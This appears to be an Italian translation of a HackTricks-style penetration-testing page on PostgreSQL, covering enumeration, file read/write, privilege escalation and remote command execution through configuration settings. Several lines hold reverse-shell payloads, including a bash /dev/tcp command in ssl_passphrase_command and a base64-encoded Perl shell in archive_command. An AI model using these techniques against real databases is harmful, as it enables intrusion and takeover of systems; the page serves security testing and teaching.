5432,5433 - Pentesting Postgresql
Last updated
Last updated
Usa Trickest per costruire e automatizzare flussi di lavoro facilmente, alimentati dagli strumenti della comunità più avanzati al mondo. Accedi oggi:
PostgreSQL è descritto come un sistema di database oggetto-relazionale che è open source. Questo sistema non solo utilizza il linguaggio SQL, ma lo migliora anche con funzionalità aggiuntive. Le sue capacità gli consentono di gestire un'ampia gamma di tipi di dati e operazioni, rendendolo una scelta versatile per sviluppatori e organizzazioni.
Porta predefinita: 5432, e se questa porta è già in uso sembra che postgresql utilizzerà la porta successiva (probabilmente 5433) che non è in uso.
Se eseguendo \list
trovi un database chiamato rdsadmin
sai di essere all'interno di un database postgresql AWS.
Per ulteriori informazioni su come abusare di un database PostgreSQL controlla:
Secondo questa ricerca, quando un tentativo di connessione fallisce, dblink
genera un'eccezione sqlclient_unable_to_establish_sqlconnection
che include una spiegazione dell'errore. Esempi di questi dettagli sono elencati di seguito.
L'host è inattivo
DETAIL: impossibile connettersi al server: Nessuna rotta verso l'host. Il server è in esecuzione sull'host "1.2.3.4" e accetta connessioni TCP/IP sulla porta 5678?
La porta è chiusa
La porta è aperta
or
La porta è aperta o filtrata
In PL/pgSQL, attualmente non è possibile ottenere dettagli sulle eccezioni. Tuttavia, se hai accesso diretto al server PostgreSQL, puoi recuperare le informazioni necessarie. Se estrarre nomi utente e password dalle tabelle di sistema non è fattibile, potresti considerare di utilizzare il metodo di attacco wordlist discusso nella sezione precedente, poiché potrebbe potenzialmente dare risultati positivi.
Se sei un membro di pg_execute_server_program
puoi eseguire programmi
Se sei un membro di pg_read_server_files
puoi leggere file
Se sei un membro di pg_write_server_files
puoi scrivere file
Nota che in Postgres un utente, un gruppo e un ruolo sono la stessa cosa. Dipende solo da come lo usi e se consenti l'accesso.
Da questo commit i membri del gruppo definito DEFAULT_ROLE_READ_SERVER_FILES
(chiamato pg_read_server_files
) e super utenti possono utilizzare il metodo COPY
su qualsiasi percorso (controlla convert_and_check_filename
in genfile.c
):
Ricorda che se non sei un super utente ma hai i permessi CREATEROLE puoi farti membro di quel gruppo:
Ci sono altre funzioni postgres che possono essere utilizzate per leggere file o elencare una directory. Solo superuser e utenti con permessi espliciti possono usarle:
Puoi trovare ulteriori funzioni in https://www.postgresql.org/docs/current/functions-admin.html
Solo super utenti e membri di pg_write_server_files
possono utilizzare copy per scrivere file.
Ricorda che se non sei un super utente ma hai i permessi CREATEROLE
puoi farti membro di quel gruppo:
Ricorda che COPY non può gestire i caratteri di nuova riga, quindi anche se stai usando un payload base64 devi inviare una riga unica.
Una limitazione molto importante di questa tecnica è che copy
non può essere usato per scrivere file binari poiché modifica alcuni valori binari.
Tuttavia, ci sono altre tecniche per caricare grandi file binari:
Suggerimento per bug bounty: iscriviti a Intigriti, una premium piattaforma di bug bounty creata da hacker, per hacker! Unisciti a noi su https://go.intigriti.com/hacktricks oggi, e inizia a guadagnare ricompense fino a $100,000!
Se hai i permessi necessari per leggere e scrivere i file del server PostgreSQL, puoi aggiornare qualsiasi tabella sul server sovrascrivendo il nodo file associato nella directory dei dati di PostgreSQL. Ulteriori informazioni su questa tecnica qui.
Passaggi richiesti:
Ottieni la directory dei dati di PostgreSQL
Nota: Se non riesci a recuperare il percorso della directory dei dati corrente dalle impostazioni, puoi interrogare la versione principale di PostgreSQL tramite la query SELECT version()
e provare a forzare il percorso. I percorsi comuni della directory dei dati nelle installazioni Unix di PostgreSQL sono /var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/
. Un nome di cluster comune è main
. 2. Ottieni un percorso relativo al filenode, associato alla tabella target
Questa query dovrebbe restituire qualcosa come base/3/1337
. Il percorso completo su disco sarà $DATA_DIRECTORY/base/3/1337
, cioè /var/lib/postgresql/13/main/base/3/1337
. 3. Scarica il filenode tramite le funzioni lo_*
Ottieni il tipo di dato, associato alla tabella target
Usa il PostgreSQL Filenode Editor per modificare il filenode; imposta tutti i flag booleani rol*
a 1 per permessi completi.
(Opzionalmente) Pulisci la cache della tabella in memoria eseguendo una query SQL costosa
Ora dovresti vedere i valori aggiornati della tabella in PostgreSQL.
Puoi anche diventare un superadmin modificando la tabella pg_authid
. Vedi la sezione seguente.
Dalla versione 9.3, solo super utenti e membri del gruppo pg_execute_server_program
possono usare copy per RCE (esempio con esfiltrazione:
Esempio per eseguire:
Ricorda che se non sei un super utente ma hai i permessi CREATEROLE
puoi farti membro di quel gruppo:
Oppure usa il modulo multi/postgres/postgres_copy_from_program_cmd_exec
di metasploit.
Ulteriori informazioni su questa vulnerabilità qui. Sebbene sia stata segnalata come CVE-2019-9193, Postges ha dichiarato che si trattava di una caratteristica e non sarà corretta.
Una volta che hai imparato dal post precedente come caricare file binari, potresti provare a ottenere RCE caricando un'estensione postgresql e caricandola.
I seguenti vettori RCE sono particolarmente utili in contesti SQLi ristretti, poiché tutti i passaggi possono essere eseguiti tramite istruzioni SELECT annidate
Il file di configurazione di PostgreSQL è scrivibile dall'utente postgres, che è quello che esegue il database, quindi come superutente, puoi scrivere file nel filesystem e, pertanto, puoi sovrascrivere questo file.
Ulteriori informazioni su questa tecnica qui.
Il file di configurazione ha alcuni attributi interessanti che possono portare a RCE:
ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'
Percorso della chiave privata del database
ssl_passphrase_command = ''
Se il file privato è protetto da password (crittografato), postgresql eseguirà il comando indicato in questo attributo.
ssl_passphrase_command_supports_reload = off
Se questo attributo è attivato, il comando eseguito se la chiave è protetta da password verrà eseguito quando pg_reload_conf()
è eseguito.
Quindi, un attaccante dovrà:
Dump della chiave privata dal server
Crittografare la chiave privata scaricata:
rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key
Sovrascrivere
Dump della configurazione attuale di postgresql
Sovrascrivere la configurazione con la configurazione degli attributi menzionati:
ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'
ssl_passphrase_command_supports_reload = on
Eseguire pg_reload_conf()
Durante il test di questo, ho notato che funzionerà solo se il file della chiave privata ha privilegi 640, è di proprietà di root e del gruppo ssl-cert o postgres (quindi l'utente postgres può leggerlo) ed è posizionato in /var/lib/postgresql/12/main.
Ulteriori informazioni su questa configurazione e su WAL qui.
Un altro attributo nel file di configurazione che è sfruttabile è archive_command
.
Per farlo funzionare, l'impostazione archive_mode
deve essere 'on'
o 'always'
. Se ciò è vero, allora potremmo sovrascrivere il comando in archive_command
e costringerlo a eseguire tramite le operazioni WAL (write-ahead logging).
I passaggi generali sono:
Controllare se la modalità di archiviazione è abilitata: SELECT current_setting('archive_mode')
Sovrascrivere archive_command
con il payload. Ad esempio, una reverse shell: archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'
Ricaricare la configurazione: SELECT pg_reload_conf()
Forzare l'operazione WAL a essere eseguita, che chiamerà il comando di archiviazione: SELECT pg_switch_wal()
o SELECT pg_switch_xlog()
per alcune versioni di Postgres
Ulteriori informazioni su questa tecnica qui.
Questo vettore di attacco sfrutta le seguenti variabili di configurazione:
session_preload_libraries
-- librerie che verranno caricate dal server PostgreSQL alla connessione del client.
dynamic_library_path
-- elenco delle directory in cui il server PostgreSQL cercherà le librerie.
Possiamo impostare il valore di dynamic_library_path
su una directory, scrivibile dall'utente postgres
che esegue il database, ad esempio, la directory /tmp/
, e caricare un oggetto .so
dannoso lì. Successivamente, costringeremo il server PostgreSQL a caricare la nostra libreria appena caricata includendola nella variabile session_preload_libraries
.
I passaggi dell'attacco sono:
Scaricare il postgresql.conf
originale
Includere la directory /tmp/
nel valore di dynamic_library_path
, ad es. dynamic_library_path = '/tmp:$libdir'
Includere il nome della libreria dannosa nel valore di session_preload_libraries
, ad es. session_preload_libraries = 'payload.so'
Controllare la versione principale di PostgreSQL tramite la query SELECT version()
Compilare il codice della libreria dannosa con il pacchetto di sviluppo PostgreSQL corretto. Codice di esempio:
Compilare il codice:
Caricare il postgresql.conf
dannoso, creato nei passaggi 2-3, e sovrascrivere quello originale
Caricare il payload.so
dal passaggio 5 nella directory /tmp
Ricaricare la configurazione del server riavviando il server o invocando la query SELECT pg_reload_conf()
Alla prossima connessione al DB, riceverai la connessione della reverse shell.
Secondo la documentazione: I ruoli che hanno il privilegio CREATEROLE
possono concedere o revocare l'appartenenza a qualsiasi ruolo che non è un superutente.
Quindi, se hai il permesso CREATEROLE
, potresti concederti accesso ad altri ruoli (che non sono superutente) che possono darti l'opzione di leggere e scrivere file ed eseguire comandi:
Gli utenti con questo ruolo possono anche cambiare le password di altri non-superuser:
È abbastanza comune scoprire che gli utenti locali possono accedere a PostgreSQL senza fornire alcuna password. Pertanto, una volta che hai ottenuto permessi per eseguire codice puoi abusare di questi permessi per concederti il ruolo di SUPERUSER
:
Questo è solitamente possibile a causa delle seguenti righe nel file pg_hba.conf
:
In questo articolo viene spiegato come sia stato possibile privesc in Postgres GCP abusando del privilegio ALTER TABLE che è stato concesso all'utente.
Quando si cerca di rendere un altro utente proprietario di una tabella, si dovrebbe ricevere un errore che lo impedisce, ma apparentemente GCP ha dato quella opzione all'utente postgres non superuser in GCP:
Unendo questa idea con il fatto che quando i comandi INSERT/UPDATE/ANALYZE vengono eseguiti su una tabella con una funzione di indice, la funzione viene chiamata come parte del comando con i permessi del proprietario della tabella. È possibile creare un indice con una funzione e dare i permessi di proprietario a un super user su quella tabella, e poi eseguire ANALYZE sulla tabella con la funzione malevola che sarà in grado di eseguire comandi perché utilizza i privilegi del proprietario.
Inizia creando una nuova tabella.
Inserisci del contenuto irrilevante nella tabella per fornire dati per la funzione di indicizzazione.
Sviluppa una funzione di indicizzazione malevola che contiene un payload di esecuzione del codice, consentendo l'esecuzione di comandi non autorizzati.
ALTERA il proprietario della tabella in "cloudsqladmin," che è il ruolo di superutente di GCP utilizzato esclusivamente da Cloud SQL per gestire e mantenere il database.
Esegui un'operazione ANALYZE sulla tabella. Questa azione costringe il motore PostgreSQL a passare al contesto utente del proprietario della tabella, "cloudsqladmin." Di conseguenza, la funzione di indicizzazione malevola viene chiamata con i permessi di "cloudsqladmin," consentendo così l'esecuzione del comando shell precedentemente non autorizzato.
In PostgreSQL, questo flusso appare in questo modo:
Quindi, la tabella shell_commands_results
conterrà l'output del codice eseguito:
Alcune istanze di postgresql mal configurate potrebbero consentire l'accesso a qualsiasi utente locale, è possibile accedere localmente da 127.0.0.1 utilizzando la dblink
function:
Nota che per la query precedente funzionare la funzione dblink
deve esistere. Se non esiste, puoi provare a crearla con
Se hai la password di un utente con più privilegi, ma l'utente non è autorizzato a effettuare il login da un IP esterno, puoi utilizzare la seguente funzione per eseguire query come quell'utente:
È possibile verificare se questa funzione esiste con:
In questo writeup, i pentester sono stati in grado di privesc all'interno di un'istanza postgres fornita da IBM, perché hanno trovato questa funzione con il flag SECURITY DEFINER:
Come spiegato nella documentazione, una funzione con SECURITY DEFINER viene eseguita con i privilegi dell'utente che la possiede. Pertanto, se la funzione è vulnerabile a SQL Injection o sta eseguendo alcune azioni privilegiate con parametri controllati dall'attaccante, potrebbe essere abusata per escalare privilegi all'interno di postgres.
Nella riga 4 del codice precedente puoi vedere che la funzione ha il flag SECURITY DEFINER.
E poi eseguire comandi:
PL/pgSQL è un linguaggio di programmazione completo che offre un maggiore controllo procedurale rispetto a SQL. Consente l'uso di cicli e altre strutture di controllo per migliorare la logica del programma. Inoltre, le istruzioni SQL e i trigger hanno la capacità di invocare funzioni create utilizzando il linguaggio PL/pgSQL. Questa integrazione consente un approccio più completo e versatile alla programmazione e automazione del database. Puoi abusare di questo linguaggio per chiedere a PostgreSQL di eseguire un attacco di brute-force sulle credenziali degli utenti.
Il seguente vettore di privesc è particolarmente utile in contesti SQLi ristretti, poiché tutti i passaggi possono essere eseguiti tramite istruzioni SELECT annidate
Se puoi leggere e scrivere file del server PostgreSQL, puoi diventare un superuser sovrascrivendo il filenode su disco di PostgreSQL, associato alla tabella interna pg_authid
.
Leggi di più su questa tecnica qui.
I passaggi dell'attacco sono:
Ottenere la directory dei dati di PostgreSQL
Ottenere un percorso relativo al filenode, associato alla tabella pg_authid
Scaricare il filenode tramite le funzioni lo_*
Ottenere il tipo di dato, associato alla tabella pg_authid
Utilizzare il PostgreSQL Filenode Editor per modificare il filenode; impostare tutti i flag booleani rol*
a 1 per permessi completi.
Ricaricare il filenode modificato tramite le funzioni lo_*
, e sovrascrivere il file originale su disco
(Opzionalmente) Cancellare la cache della tabella in memoria eseguendo una query SQL costosa
Ora dovresti avere i privilegi di un superadmin completo.
All'interno del file postgresql.conf puoi abilitare i log di postgresql modificando:
Poi, riavvia il servizio.
pgadmin è una piattaforma di amministrazione e sviluppo per PostgreSQL. Puoi trovare password all'interno del file pgadmin4.db Puoi decrittarle usando la funzione decrypt all'interno dello script: https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py
L'autenticazione del client in PostgreSQL è gestita tramite un file di configurazione chiamato pg_hba.conf. Questo file contiene una serie di record, ciascuno dei quali specifica un tipo di connessione, un intervallo di indirizzi IP del client (se applicabile), il nome del database, il nome utente e il metodo di autenticazione da utilizzare per le connessioni corrispondenti. Il primo record che corrisponde al tipo di connessione, all'indirizzo del client, al database richiesto e al nome utente viene utilizzato per l'autenticazione. Non c'è alcun fallback o backup se l'autenticazione fallisce. Se nessun record corrisponde, l'accesso è negato.
I metodi di autenticazione basati su password disponibili in pg_hba.conf sono md5, crypt e password. Questi metodi differiscono nel modo in cui la password viene trasmessa: hashata MD5, crittografata con crypt o in chiaro. È importante notare che il metodo crypt non può essere utilizzato con password che sono state crittografate in pg_authid.
Use Trickest to easily build and automate workflows powered by the world's most advanced community tools. Get Access Today:
Impara e pratica Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Impara e pratica Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Tipi di Ruolo | |
---|---|
6. Ricarica il filenode modificato tramite le funzioni lo_*
, e sovrascrivi il file originale sul disco
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
rolsuper
Il ruolo ha privilegi di superutente
rolinherit
Il ruolo eredita automaticamente i privilegi dei ruoli di cui è membro
rolcreaterole
Il ruolo può creare altri ruoli
rolcreatedb
Il ruolo può creare database
rolcanlogin
Il ruolo può accedere. Cioè, questo ruolo può essere dato come identificatore di autorizzazione della sessione iniziale
rolreplication
Il ruolo è un ruolo di replica. Un ruolo di replica può avviare connessioni di replica e creare e rimuovere slot di replica.
rolconnlimit
Per i ruoli che possono accedere, questo imposta il numero massimo di connessioni concorrenti che questo ruolo può effettuare. -1 significa nessun limite.
rolpassword
Non la password (legge sempre come ********
)
rolvaliduntil
Tempo di scadenza della password (utilizzato solo per l'autenticazione della password); null se non c'è scadenza
rolbypassrls
Il ruolo ignora ogni politica di sicurezza a livello di riga, vedere Sezione 5.8 per ulteriori informazioni.
rolconfig
Valori predefiniti specifici per il ruolo per le variabili di configurazione a runtime
oid
ID del ruolo